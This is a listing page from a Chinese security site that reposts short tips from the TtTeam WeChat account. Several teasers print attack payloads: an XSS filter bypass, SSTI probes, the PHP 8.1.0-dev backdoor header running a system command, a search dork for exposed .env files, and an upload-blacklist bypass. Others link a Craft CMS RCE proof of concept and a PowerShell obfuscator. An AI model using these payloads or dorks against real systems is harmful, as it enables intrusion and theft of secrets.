ttteam | CN-SEC 中文网

安全文章

敏感信息 Tips

title:"index of /" AND ".env" OR ".config" OR ".json" AND domain_from_banner:*原文始发于微信公众号（TtTeam）：敏感信...

06月16日31 views评论

阅读全文

安全文章

CloudFlare XSS Bypass

"><P/onpointerenter=alert(1)>原文始发于微信公众号（TtTeam）：CloudFlare XSS Bypass

06月16日21 views评论

阅读全文

安全工具

在线PowerShell 混淆器

https://powershellforhackers.com/tools/obfuscator/原文始发于微信公众号（TtTeam）：在线PowerShell 混淆器

06月03日20 views评论

阅读全文

安全漏洞

CVE-2024-56145：Craft CMS RCE POC

该问题是由于对用户提供的模板路径处理不当而引起的，允许攻击者通过特制的有效载荷实现远程代码执行 (RCE) 。https://github.com/Chocapikk/CVE-2024-56145 原...

04月23日35 views评论

阅读全文

安全工具

gitrecon：GitHub 存储库扫描仪

此工具使用 GitHub API 扫描用户拥有的存储库，以查找电子邮件地址和关联名称。它提供扫描特定存储库和排除分叉存储库的选项。此外，您还可以提供 GitHub API 令牌来提高 API 请求的速...

04月08日10 views评论

阅读全文

安全文章

SSTI Payload

"{{7*7}}""${7*7}""<%= 7 * 7 %>"原文始发于微信公众号（TtTeam）：SSTI Payload

03月19日9 views评论

阅读全文

安全新闻

TP-Link 0 day漏洞在暗网上出售

据称，一名威胁行为者宣传 TP-Link RCE 漏洞，声称它可以自主传播、窃取凭证并持续存在而不被发现。价格：1,000 至 2,000 美元。原文始发于微信公众号（TtTeam）：TP-Link...

03月10日33 views评论

阅读全文

安全文章

提取所有API接口

curl -s URL | grep -Po "(/)((?:[a-zA-Z-_:.0-9{}]+))(/)*((?:[a-zA-Z-_:.0-9{}]+))(/)((?:[a-zA-Z-_/:.0-...

02月28日16 views评论

阅读全文

安全文章

PHP 黑名单绕过上传

上传 .htaccess 文件可以强制服务器将任何扩展名视为 PHP 文件原文始发于微信公众号（TtTeam）：PHP 黑名单绕过上传

02月05日10 views评论

阅读全文

安全文章

PHP 8.1.0-dev RCE & SQLi

User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id');原文始发于微信公众号（TtTeam）：PHP 8.1.0-dev RC...

01月21日43 views评论

阅读全文

安全工具

Exchange 信息收集工具

01 工具介绍 Exchange 信息收集工具参考项目 https://github.com/Ridter/owa_info/ https://3gstudent.github.io/%E6%B8%...

09月18日25 views评论

阅读全文

HW&HVV

Hvv 吃瓜 3

原文始发于微信公众号（TtTeam）：Hvv 吃瓜 3

07月26日65 views评论

阅读全文

在线咨询

微信